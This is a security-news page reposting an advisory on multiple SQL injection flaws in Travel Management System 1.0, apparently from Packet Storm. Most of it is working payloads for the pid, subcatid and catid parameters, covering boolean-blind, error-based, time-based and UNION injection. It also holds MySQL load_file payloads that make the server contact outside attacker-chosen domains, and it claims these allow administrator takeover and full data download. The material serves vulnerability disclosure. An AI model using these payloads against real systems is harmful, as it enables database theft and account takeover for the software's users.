Security
Headlines
HeadlinesLatestCVEs

Headline

Travel Management System 1.0 SQL Injection

Travel Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities. Original discovery of SQL injection in this version is attributed to Bobby Cooke and hyd3sec in August of 2020.

Packet Storm
Open in Source
#sql#vulnerability#git#php#auth
## Title: Travel Management System 1.0 Multiple SQLi## Author: nu11secur1ty## Date: 05.07.2022## Vendor: https://code-projects.org/author/fabian/## Software: https://code-projects.org/travel-management-system-using-php-source-code/## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-28079## Description:The pid, subcatid and catid parameters appear to be vulnerable to SQLinjection attacks.The payload '+(selectload_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+'was submitted in the all parameters.This payload injects a SQL sub-queries that call MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.The attacker can take administrator accounts control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: pid (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: pid=12'+(selectload_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''OR NOT 1485=1485 AND 'nTcz'='nTcz    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: pid=12'+(selectload_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''OR (SELECT 7369 FROM(SELECT COUNT(*),CONCAT(0x716b767671,(SELECT(ELT(7369=7369,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OIAM'='OIAM    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: pid=12'+(selectload_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''AND (SELECT 4768 FROM (SELECT(SLEEP(5)))llcY) AND 'EiGX'='EiGX    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: pid=12'+(selectload_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b767671,0x5a716d6f4e64696f557a4d784663766d435a634a6d4d434b4b477057454a537a45516d445a77767a,0x717a6b7871),NULL,NULL,NULL#---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Parameter: subcatid (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: subcatid=-4598' OR 9251=9251 AND 'kzhS'='kzhS    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: subcatid=7'+(selectload_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+''AND (SELECT 2330 FROM(SELECT COUNT(*),CONCAT(0x717a7a7871,(SELECT(ELT(2330=2330,1))),0x716a6b7a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Qftm'='Qftm    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: subcatid=7'+(selectload_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+''AND (SELECT 2506 FROM (SELECT(SLEEP(5)))yVKW) AND 'QRSS'='QRSS    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: subcatid=7'+(selectload_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a7871,0x4142654745746c4c54786a476756684b7864575669645759754f694d5671586a51506a474a475652,0x716a6b7a71),NULL,NULL,NULL#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Parameter: catid (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: catid=-9719' OR 2503=2503 AND 'ydxn'='ydxn    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: catid=3'+(selectload_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+''AND (SELECT 9602 FROM(SELECT COUNT(*),CONCAT(0x71786b6a71,(SELECT(ELT(9602=9602,1))),0x7170626b71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xPSh'='xPSh    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: catid=3'+(selectload_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+''AND (SELECT 1843 FROM (SELECT(SLEEP(5)))XNBw) AND 'KRBS'='KRBS    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: catid=3'+(selectload_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+''UNION ALL SELECTNULL,CONCAT(0x71786b6a71,0x62596c6a72746a584a7048484a70435867556a656d6e5a734474725650477853527466545071436a,0x7170626b71),NULL,NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/Travel-Management-System)## Proof and Exploit:[href](https://streamable.com/8nroqp)

Related news

CVE-2022-28079: College Management System In PHP With Source Code

College Management System v1.0 was discovered to contain a SQL injection vulnerability via the course_code parameter.

Packet Storm: Latest News

Ubuntu Security Notice USN-7089-6
Packet Storm